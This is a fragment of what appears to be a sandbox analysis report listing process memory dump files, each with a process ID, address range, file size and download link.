memory/1768-311-0x0000000019C30000-0x0000000019F12000-memory.dmp

Filesize
2.9MB

Download
memory/1768-314-0x000000000125B000-0x0000000001292000-memory.dmp

Filesize
220KB

Download
memory/1768-312-0x0000000001250000-0x00000000012D0000-memory.dmp

Filesize
512KB

Download
memory/1800-241-0x000000013F300000-0x000000013F6BD000-memory.dmp

Filesize
3.7MB

Download
memory/1800-102-0x000000013F300000-0x000000013F6BD000-memory.dmp

Filesize
3.7MB

Download
memory/1864-119-0x0000000000400000-0x0000000000409000-memory.dmp

Filesize
36KB

Download
memory/1864-152-0x0000000000400000-0x0000000000409000-memory.dmp

Filesize
36KB

Download
memory/1864-107-0x0000000000400000-0x0000000000409000-memory.dmp

Filesize
36KB

Download
memory/1864-106-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

Filesize
4KB

Download
memory/1968-316-0x0000000019B00000-0x0000000019DE2000-memory.dmp

Filesize
2.9MB

Download
memory/1968-318-0x0000000000AAB000-0x0000000000AE2000-memory.dmp

Filesize
220KB

Download
memory/1968-317-0x0000000000AA4000-0x0000000000AA7000-memory.dmp

Filesize
12KB

Download
memory/2004-157-0x0000000000400000-0x0000000002588000-memory.dmp

Filesize
33.5MB

Download
memory/2004-150-0x0000000000240000-0x0000000000280000-memory.dmp

Filesize
256KB

Download